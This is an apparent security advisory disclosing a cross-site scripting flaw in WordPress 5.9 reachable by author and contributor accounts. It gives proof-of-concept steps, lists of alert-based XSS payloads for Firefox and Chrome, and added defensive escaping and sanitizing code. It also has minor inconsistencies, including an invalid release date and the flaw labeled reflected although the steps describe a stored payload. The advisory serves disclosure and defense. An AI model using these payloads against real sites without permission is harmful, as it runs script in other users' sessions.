WordPress 5.9 Cross Site Scripting

Posted Feb 10, 2022
Authored by Taurus Omar

WordPress versions 5.9 and below suffer from a cross site scripting vulnerability in the author and contributor roles. Per the researcher, WordPress is addressing this in their next release and considers this a medium severity vulnerability.

tags | exploit, xss
SHA-256 | eb036d4467921c95f77944d1565e15824ae56f7f501944425c1be75fb150f82d

Document Title:
===============
Wordpress <= 5.9 Cross-Site Scripting Reflected (Authenticated)


Credits & Authors:
==================
Taurus Omar [taurusomar13@gmail.com]


Disclosure Type:
================
Independent Security Research


Release Date:
=============
2022-31-01


Vulnerability Disclosure Timeline:
==================================
2022-05-02: Public Disclosure


Vulnerability CVE
===================
Pending (CVE-xxxxx)


Vulnerability Class:
====================
Cross Site Scripting - Reflected


Product & Service Introduction:
===============================
WordPress (WP, WordPress.org) is a free and open-source content
management system (CMS) written in PHP and paired with a MySQL or
MariaDB database. Features include a plugin architecture and a template
system, referred to within WordPress as Themes. WordPress was originally
created as a blog-publishing system but has evolved to support other web
content types including more traditional mailing lists and forums, media
galleries, membership sites, learning management systems (LMS) and online
stores. One of the most popular content management system solutions in
use, WordPress is used by 42.8% of the top 10 million websites as of
October 2021.


Vendor HomePage
===============================
https://wordpress.org/download/


Abstract Advisory Information:
==============================
An independent vulnerability researcher discovered a reflected cross-site
scripting vulnerability in the WordPress framework.


Affected Product(s):
====================
All WordPress versions <= 5.9


Discovery Status:
=================
Published


Exploitation Technique:
=======================
Local


Severity Level:
===============
Medium


Proof of Concept (PoC):
=======================
The reflected XSS is triggered when a user with the AUTHOR or CONTRIBUTOR
role adds a JavaScript payload in the post's Excerpt field; whenever a
user then uses the Add Block function in a post or page, the XSS is
executed. The post and page editor also executes the payload directly
when the malicious markup is simply copied and pasted into it.

## POC1: The malicious Excerpt is executed in the post and page
sections at the moment the Add New Block function is used and a name is
typed into the block search field, and it is reflected in all the
WordPress editor sections.

1.) Log in with a user that has the author or contributor role
2.) Add a new post
3.) Add the Post Excerpt block
4.) Add the malicious code in the Excerpt field (<object data="javascript:alert(0)">)
5.) Replicated

## POC2: XSS IN THE ADD BLOCK FUNCTION
1.) Log in with a user that has the author role
2.) Add a new post
3.) Publish the post
4.) Add the malicious code in the Excerpt field (<object data="javascript:alert(0)">)
5.) In the post editor, add a new block
6.) Search for something in the block search field
7.) Replicated

## POC3: XSS IN THE POST & PAGE EDITOR
1.) Log in with a user that has the author or contributor role
2.) Add a new post
3.) Copy & paste (<object data="javascript:alert(0)">) into the editor
4.) Replicated


## Firefox Payload:
<object data="javascript:alert('xss')">
<object data=/ onload=alert(1)>
<iframe src="javascript:alert(1)">

## Chrome Payload:
<form><button formaction=javascript:alert(1)>XSS
<iframe src="javascript:alert(1)">
<form action=javascript:alert(1)><input type=submit value=XSS>

## Poc Image:
https://i.imgur.com/WiaEUEE.png
https://i.imgur.com/voJptm0.png

## Poc Video
https://www.youtube.com/watch?v=UEgEMADeOC8


Solution - Fix & Patch:
=======================
The vulnerability can be resolved by encoding and securely parsing /
escaping the inputs. In a second step, the output location where the
execution occurs needs to be sanitized.
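One way to implement the fix described above, as an added example that is not WordPress core code: escape the excerpt at the output location where it is rendered, and, where limited formatting must survive, pass it through an allow-list sanitizer (a stand-in here for what a maintained sanitizer such as wp_kses does). All function names are assumed; the payload strings are the ones listed in this advisory, used only as test input.

```javascript
// Added example (not WordPress core code): escape-on-output and an
// allow-list sanitizer for excerpt text shown inside an editor panel.

// Payload strings as listed in the advisory, used here only as test input.
const ADVISORY_PAYLOADS = [
  '<object data="javascript:alert(\'xss\')">',
  '<object data=/ onload=alert(1)>',
  '<iframe src="javascript:alert(1)">',
  '<form><button formaction=javascript:alert(1)>XSS',
];

// Escape the characters that are significant in HTML text and attribute
// contexts, so the excerpt is rendered as literal text.
function escapeHtml(text) {
  const map = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };
  return String(text).replace(/[&<>"']/g, (ch) => map[ch]);
}

// Vulnerable pattern: the stored excerpt is concatenated into markup
// verbatim, so any element it carries becomes live DOM when rendered.
function renderExcerptUnsafe(excerpt) {
  return `<div class="block-result">${excerpt}</div>`;
}

// Hardened pattern: escape at the output location, in the context where
// the value lands (here, an HTML text node).
function renderExcerptSafe(excerpt) {
  return `<div class="block-result">${escapeHtml(excerpt)}</div>`;
}

// Minimal allow-list sanitizer for cases where simple inline formatting
// must survive: keeps <b>, <i>, <em>, <strong> with no attributes and
// drops every other tag. Illustrative only; production code should use a
// maintained sanitizer (wp_kses on the PHP side, DOMPurify in the browser).
function sanitizeExcerpt(html) {
  const allowed = new Set(['b', 'i', 'em', 'strong']);
  return String(html).replace(/<(\/?)([a-zA-Z][a-zA-Z0-9]*)\b[^>]*>/g,
    (_tag, slash, name) => {
      const n = name.toLowerCase();
      return allowed.has(n) ? `<${slash}${n}>` : '';
    });
}

// Regression check: does the rendered string still contain an element that
// a browser would instantiate? Escaped text never does.
function containsLiveTag(markup) {
  return /<(object|iframe|form|button|input|script|img|svg|embed)\b/i.test(markup);
}
```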


## Impact
Cross-Site Scripting: the XSS payload is executed in every section where
the editor and the search field of the Add Block function can be used,
as well as in the post and page editor through the copy and paste
function.


#######
#
# Disclaimer:
# This or previous programs are for Educational purpose ONLY. Do not use it without permission.
# The usual disclaimer applies, especially the fact that Taurus Omar is not liable for any damages
# caused by direct or indirect use of the information or functionality provided by these programs.
# The author or any Internet provider bears NO responsibility for content or misuse of these programs
# or any derivatives thereof. By using these programs you accept the fact that any damage (dataloss,
# system crash, system compromise, etc.) caused by the use of these programs are not Taurus Omar's
# responsibility.
#
#######